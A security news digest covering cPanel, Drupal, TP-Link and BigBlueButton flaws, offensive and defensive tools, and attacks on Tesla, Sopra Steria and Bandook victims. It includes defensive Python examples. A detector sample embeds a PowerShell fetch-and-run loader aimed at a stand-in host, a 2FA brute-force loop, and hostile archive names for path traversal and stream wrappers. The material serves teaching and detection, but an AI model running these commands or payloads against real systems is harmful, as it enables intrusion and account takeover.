Digest without zero-days, with malware and Tesla news

There are no zero-day vulnerabilities or new headline stories in this digest, but there are tool updates and a mix of news and research.

  • Vulnerabilities: no zero-days, only emergency updates for cPanel and Drupal, plus exploits for a TP-Link device and BigBlueButton;
  • Tools: an update to a powerful threat-intelligence tool, and others;
  • News: Tesla hacked! Then Sopra Steria and malware activity. Baidu's apps were pulled from Google Play 🙁 ;
  • Research: ransomware attacks against Microsoft Defender, plus other useful reading 🙂

Really short feedback -> here


Vulnerabilities

A critical vulnerability allowing a two-factor authentication (2FA) bypass was found in cPanel, the most popular hosting control panel.

Two-factor authentication in older versions of cPanel and WebHost Manager (WHM) was vulnerable to brute force: an attacker who already held valid account credentials could guess the second factor submitted as a URL parameter, because attempts were not limited, and so bypass 2FA where it was enabled for the account.

cPanel's developers responded to the researcher's report and fixed the issue. All users are encouraged to upgrade cPanel and WHM to the fixed versions 11.92.0.2, 11.90.0.17 and 11.86.0.32 as soon as possible.

https://vulners.com/thn/THN:A7B8EDD6FA870FFB004B59A8BB3216E1
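To see why an unthrottled second-factor check is fatal, here is an added example (not cPanel's code and not the researcher's exploit): a minimal RFC 6238 TOTP verifier in Python, with and without a lockout, and an attacker who already has the password and simply iterates every six-digit code. The secret is the public RFC 4226 test vector; the verifier class, its lockout policy and the fixed timestamp are assumptions made for illustration.

```python
import hashlib
import hmac
import struct

# RFC 4226 / RFC 6238 test secret (public test vector, for demonstration only)
RFC_SECRET = b"12345678901234567890"


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """HOTP (RFC 4226): HMAC-SHA1 over the big-endian counter, dynamically truncated."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(secret: bytes, now: int, step: int = 30, digits: int = 6) -> str:
    """TOTP (RFC 6238): HOTP with the counter derived from Unix time."""
    return hotp(secret, now // step, digits)


class TotpVerifier:
    """Hypothetical server-side second-factor check (not cPanel's code).

    max_attempts=None reproduces the weak behaviour: every guess is checked,
    so an attacker holding the password can iterate all 10**digits codes.
    A small max_attempts adds a lockout after that many consecutive failures.
    """

    def __init__(self, secret, max_attempts=None, lockout_seconds=900,
                 skew=1, step=30, digits=6):
        self.secret, self.max_attempts = secret, max_attempts
        self.lockout_seconds, self.skew = lockout_seconds, skew
        self.step, self.digits = step, digits
        self.failures = 0
        self.locked_until = 0
        self._codes = {}  # counter -> expected code, computed once per time step

    def _expected(self, counter: int) -> str:
        if counter not in self._codes:
            self._codes[counter] = hotp(self.secret, counter, self.digits)
        return self._codes[counter]

    def verify(self, submitted: str, now: int) -> str:
        """Return 'ok', 'bad' or 'locked'."""
        if now < self.locked_until:
            return "locked"
        if not submitted.isascii():
            submitted = ""  # compare_digest needs ASCII str; treat as a miss
        counter = now // self.step
        ok = False
        # Accept +/- skew steps for clock drift. Compare every candidate in
        # constant time and never exit early, so timing leaks nothing.
        for c in range(counter - self.skew, counter + self.skew + 1):
            ok |= hmac.compare_digest(submitted, self._expected(c))
        if ok:
            self.failures = 0
            return "ok"
        self.failures += 1
        if self.max_attempts is not None and self.failures >= self.max_attempts:
            self.failures = 0
            self.locked_until = now + self.lockout_seconds
        return "bad"


def brute_force(verifier: TotpVerifier, now: int):
    """Attacker already holds the password and tries every code in order.

    Returns the number of requests needed, or None if the server locked out.
    """
    for guess in range(10 ** verifier.digits):
        status = verifier.verify(f"{guess:0{verifier.digits}d}", now)
        if status == "ok":
            return guess + 1
        if status == "locked":
            return None
    return None


if __name__ == "__main__":
    weak = TotpVerifier(RFC_SECRET)
    print("unthrottled verifier fell after", brute_force(weak, now=59), "guesses")
    hard = TotpVerifier(RFC_SECRET, max_attempts=5)
    print("throttled verifier:", brute_force(hard, now=59), "(locked out)")
```

With no limit the attacker lands on an accepted code in at most 10^6 requests (here 287,083, because the server also accepts one time step of clock skew either side); with a lockout after five failures the same loop stalls at once. In production the controls to check for are rate limiting per account and per source, and alerting on lockouts.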

The Drupal team fixed two remote code execution vulnerabilities, both in the PEAR Archive_Tar library bundled with Drupal core; they matter for sites that accept .tar, .tar.gz, .bz2 or .tlz uploads.

  1. CVE-2020-28948: the check for phar:// URIs in archive file names was case-sensitive, so an uppercase PHAR:// name slipped through and could trigger PHP object deserialization;
  2. CVE-2020-28949: the file-name sanitization only covered phar, so other stream wrappers (for example file://) could still be used to write files to arbitrary locations.

https://vulners.com/drupal/DRUPAL-SA-CORE-2020-013
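As an added illustration of this class of bug (example code, not Archive_Tar's or Drupal's): a Python archive-vetting step that contrasts a case-sensitive check for a single scheme with a check that refuses every stream-wrapper URI, absolute paths and traversal. The archive, its member names and both check functions are constructed for this example.

```python
import io
import re
import tarfile

# Any "scheme://" prefix (phar, file, data, ...), matched case-insensitively.
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.IGNORECASE)


def weak_name_check(name: str) -> bool:
    """Illustrates the flawed pattern behind the two CVEs: a case-sensitive
    check for one scheme only. Hypothetical, not Archive_Tar's code."""
    return not name.startswith("phar://")


def safe_member_name(name: str) -> bool:
    """Hardened check: reject every stream-wrapper URI regardless of case,
    absolute paths (POSIX or drive-letter), and any '..' path component."""
    if SCHEME_RE.match(name):
        return False
    if name.startswith(("/", "\\")) or re.match(r"^[A-Za-z]:", name):
        return False
    if ".." in re.split(r"[\\/]+", name):
        return False
    return True


def build_tar(names) -> bytes:
    """Build an in-memory tar with one tiny file per name (constructed sample)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        for name in names:
            info = tarfile.TarInfo(name)
            info.size = 1
            tf.addfile(info, io.BytesIO(b"x"))
    return buf.getvalue()


def rejected_members(blob: bytes, check=safe_member_name):
    """Return the member names the given check would refuse to extract."""
    with tarfile.open(fileobj=io.BytesIO(blob), mode="r") as tf:
        return sorted(m.name for m in tf.getmembers() if not check(m.name))


# Constructed upload: one benign file and four hostile member names.
SAMPLE_NAMES = [
    "docs/readme.txt",
    "phar://evil.phar/x",               # the only case the weak check catches
    "PHAR://evil.phar/x",               # CVE-2020-28948 style: different case
    "file:///tmp/owned.php",            # CVE-2020-28949 style: another wrapper
    "../../sites/default/settings.php", # plain path traversal
]
SAMPLE_TAR = build_tar(SAMPLE_NAMES)

if __name__ == "__main__":
    print("weak check rejects:    ", rejected_members(SAMPLE_TAR, weak_name_check))
    print("hardened check rejects:", rejected_members(SAMPLE_TAR))
```

The point of the hardened check is that it does not enumerate bad schemes at all: anything that parses as a URI scheme is refused, so a new wrapper or a different letter case cannot reopen the hole.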

CVE-2020-24363

A vulnerability in the TP-Link TL-WA855RE Wi-Fi range extender allows an unauthenticated attacker on the same network to trigger a factory reset and reboot of the device. The attacker can then take full control by setting a new administrator password in place of the default one printed in the manual.

Exploit: https://vulners.com/exploitdb/EDB-ID:49092

A couple of exploits for BigBlueButton, an open-source web conferencing system built for distance learning.

E-mail Validation Bypass: https://vulners.com/packetstorm/PACKETSTORM:160239

Brute Force: https://vulners.com/packetstorm/PACKETSTORM:160238


Tools

IntelOwl 1.9.0 released. IntelOwl is your friendly threat intelligence tool for malware analysis and security research! Release details: https://github.com/intelowlproject/IntelOwl/releases

Project: https://github.com/intelowlproject/IntelOwl

Docs: https://intelowl.readthedocs.io

Talon
A tool designed to perform automated password guessing attacks while attempting to remain undetected. Talon can take a list of users and identify which are valid using Kerberos, and can run password guessing attacks against the Kerberos and LDAPS (LDAP Secure) services.

https://vulners.com/kitploit/KITPLOIT:2982850037566839307
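Added example (not part of Talon or the digest): the defender's side of the same activity. Kerberos user enumeration leaves 4768 events with status 0x6 (unknown principal), and password guessing against accounts that require pre-authentication leaves 4771 events with failure code 0x18 (bad password). This Python detector walks a constructed extract of such events and flags a source IP that touches many distinct accounts inside a sliding window. Field names follow the Windows Security log; the sample records, thresholds and window size are assumptions. LDAPS guessing is not covered here.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# 4768 with Status 0x6  = KDC_ERR_C_PRINCIPAL_UNKNOWN (the account does not exist)
# 4771 with Status 0x18 = KDC_ERR_PREAUTH_FAILED (account exists, wrong password)
UNKNOWN_USER = (4768, "0x6")
BAD_PASSWORD = (4771, "0x18")


def _max_distinct_in_window(pairs, window):
    """Largest number of distinct names seen inside any sliding time window.
    pairs: list of (datetime, name)."""
    pairs = sorted(pairs)
    counts = defaultdict(int)
    best = start = 0
    for t, name in pairs:
        counts[name] += 1
        while t - pairs[start][0] > window:      # drop events older than the window
            old = pairs[start][1]
            counts[old] -= 1
            if counts[old] == 0:
                del counts[old]
            start += 1
        best = max(best, len(counts))
    return best


def detect_kerberos_guessing(events, window_seconds=300, threshold=5):
    """Flag source IPs that hit >= threshold distinct accounts within a window.

    Many unknown principals from one IP  -> user enumeration (Talon's first step).
    Many bad passwords across accounts   -> password spray (one guess per user).
    A single user failing repeatedly is left alone: that is a typo, not a spray.
    """
    window = timedelta(seconds=window_seconds)
    buckets = {UNKNOWN_USER: defaultdict(list), BAD_PASSWORD: defaultdict(list)}
    for ev in events:
        key = (ev["EventID"], ev["Status"].lower())
        if key in buckets:
            buckets[key][ev["IpAddress"]].append(
                (datetime.fromisoformat(ev["TimeCreated"]), ev["TargetUserName"].lower()))
    alerts = []
    for ip in sorted(set(buckets[UNKNOWN_USER]) | set(buckets[BAD_PASSWORD])):
        n = _max_distinct_in_window(buckets[UNKNOWN_USER].get(ip, []), window)
        if n >= threshold:
            alerts.append({"rule": "kerberos_user_enumeration", "ip": ip, "distinct": n})
        n = _max_distinct_in_window(buckets[BAD_PASSWORD].get(ip, []), window)
        if n >= threshold:
            alerts.append({"rule": "kerberos_password_spray", "ip": ip, "distinct": n})
    return alerts


def _event(hhmmss, event_id, user, ip, status):
    return {"TimeCreated": f"2020-11-30T{hhmmss}", "EventID": event_id,
            "TargetUserName": user, "IpAddress": ip, "Status": status}


# Constructed Security-log extract (not real data): 10.0.0.50 first probes six
# non-existent names, then tries one password against six real accounts;
# 10.0.0.7 is one user mistyping their own password three times, then logging in.
SAMPLE_EVENTS = (
    [_event(f"09:00:{i:02d}", 4768, f"ghost{i}", "10.0.0.50", "0x6") for i in range(6)]
    + [_event(f"09:01:{i * 10:02d}", 4771, f"user{i}", "10.0.0.50", "0x18") for i in range(6)]
    + [_event(f"09:02:{i * 5:02d}", 4771, "bob", "10.0.0.7", "0x18") for i in range(3)]
    + [_event("09:03:00", 4768, "bob", "10.0.0.7", "0x0")]
)

if __name__ == "__main__":
    for alert in detect_kerberos_guessing(SAMPLE_EVENTS):
        print(alert)
```

Tune the window to the tool's pacing: a slow spray that spaces guesses minutes apart slips under a 30-second window but still shows up over five minutes, which is why the example counts distinct accounts rather than raw event volume.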

elk-tls-docker: a new open-source tool to stand up the Elastic Security stack with self-signed or Let's Encrypt certificates:

https://github.com/swimlane/elk-tls-docker

RedShell
An interactive command prompt that executes commands through proxychains and automatically logs them on a Cobalt Strike team server.

https://vulners.com/kitploit/KITPLOIT:1009239299709344568


News

Researchers from the COSIC group at the University of Leuven (Belgium) bought a used Tesla Model X electronic control unit (ECU) on eBay, took it apart and found flaws in how the key fob is authenticated over Bluetooth Low Energy (BLE). Using a modified ECU, they were able to push malicious firmware onto the key fob and then obtain an unlock message from it.

With a rig made of the modified ECU and key fob, a Raspberry Pi with a CAN interface and a battery, the Belgians were able to steal a Tesla Model X. The whole process, shown in a short clip included in the report, takes only two or three minutes. The one limitation: to pair the owner's key fob with the modified ECU, the attacker must come within about 5 meters of it, but that takes only a few seconds.

https://vulners.com/threatpost/THREATPOST:09B5423D2CCF69E5E3DC9409EB575216

Ryuk hit the French IT giant Sopra Steria, taking down the company's network. The company has spent almost a month recovering its systems and said the Ryuk attack will ultimately cost it between 40 and 50 million euros.

We already wrote about this company in our digest last month: Bug Parade with all headliners, zero-days and malware news

Sopra Steria reported that no data leak has been identified at this stage. Lately these are the frequent words of many attacked companies, and it often turns out later that the company had already paid the ransom and "recovered".

https://vulners.com/hackread/HACKREAD:638FD52F7A526876477E44B62533A31B

Check Point described new activity by the Bandook Trojan, which once again confirms that the malware is part of the toolset of a hired actor running offensive operations under contract for various intelligence agencies.

Bandook was used in Operation Dark Caracal, disclosed in 2018, which exfiltrated hundreds of gigabytes of data belonging to thousands of victims in 21 countries across North America, Europe and Asia.

The attack begins with a phishing document containing a malicious macro that runs a PowerShell loader. The loader in turn delivers the Bandook RAT itself, a full-featured spyware tool with all the expected functions: gathering system information, working with files, taking screenshots, and so on.

https://vulners.com/thn/THN:53943CA671B8B44BEC3928429FF1024B
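Added example (not from the Check Point report): the macro-to-PowerShell hop is where this chain is most visible on an endpoint, so here is a Python triage routine for Sysmon event-1 style process records. It flags a script host whose parent is an Office application, decodes a -EncodedCommand payload (base64 of UTF-16LE) and lists the suspicious keywords found in the visible command. The sample records, the loader URL and the keyword list are constructed for the example.

```python
import base64
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}

# PowerShell accepts any unambiguous prefix of -EncodedCommand; the listed
# spellings are the common ones (assumption: illustrative, not exhaustive).
ENCODED_RE = re.compile(
    r"(?i)(?:^|\s)[-/](?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
# Keywords worth surfacing to an analyst (constructed list, extend as needed).
LOLBIN_RE = re.compile(
    r"(?i)downloadstring|downloadfile|invoke-expression|\biex\b|-nop\b"
    r"|-w(?:indowstyle)?\s+hidden|frombase64string")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def encode_powershell(script: str) -> str:
    """Build the -EncodedCommand form the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage_process_events(events):
    """Flag script hosts spawned by an Office app (the macro -> loader step)
    and show what the command actually does once the encoding is removed."""
    hits = []
    for ev in events:
        parent, child = _basename(ev["ParentImage"]), _basename(ev["Image"])
        if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
            decoded = decode_encoded_command(ev["CommandLine"])
            # Scan the switches plus the decoded script, minus the base64 blob
            # itself so random base64 text cannot produce false keyword hits.
            visible = ENCODED_RE.sub(" ", ev["CommandLine"]) + " " + (decoded or "")
            hits.append({
                "parent": parent,
                "child": child,
                "decoded": decoded,
                "indicators": sorted({m.group(0).lower() for m in LOLBIN_RE.finditer(visible)}),
            })
    return hits


# Constructed Sysmon event-1 style records (not real telemetry).
LOADER_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://loader.invalid/stage2.ps1')"
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_powershell(LOADER_SCRIPT)},
    {"ParentImage": r"C:\Windows\explorer.exe",            # benign: user-launched
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -File C:\\Scripts\\backup.ps1"},
]

if __name__ == "__main__":
    for hit in triage_process_events(SAMPLE_EVENTS):
        print(hit)
```

The parent-child pairing is the durable signal here: the loader's URL and encoding change from campaign to campaign, but a word processor has no business spawning a hidden, no-profile PowerShell.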

Baidu’s Android apps caught collecting user data. The Baidu Maps and Baidu Search Box apps were found collecting user data and were removed from the Google Play Store.

Palo Alto Networks reports that similar data-collection code was found in the ShareSDK developed by the Chinese giant MobTech. Used by over 37,500 apps, this SDK also lets app developers collect the phone model, screen resolution, MAC address, Android ID, advertising ID, carrier information, IMSI and IMEI.

Baidu’s representatives say it was not the data collection that got the apps removed (the company had obtained user consent to collect this information); rather, Google engineers had discovered other issues that Baidu was already working to fix.

https://vulners.com/thn/THN:2E8D61B80974C445E3A551536FADB494


Research

1000+ iq

A tale of evasion in a restricted environment: DLL side-loading + phantom DLL hollowing + Google Apps Script for C2 communications: https://www.blackarrow.net/hindering-threat-hunting-a-tale-of-evasion-in-a-restricted-environment

Demystifying Ransomware Attacks against Microsoft Defender Solution: https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/demystifying-ransomware-attacks-against-microsoft-defender/ba-p/1928947?WT.mc_id=modinfra-0000-abartolo

InfoSec Black Friday Deals 2020 (updated). https://github.com/0x90n/InfoSec-Black-Friday and https://github.com/Securityinfos/Black-Friday-Deals

Cross-site Scripting via WHOIS and DNS Records: https://medium.com/tenable-techblog/cross-site-scripting-via-whois-and-dns-records-a25c33667fff

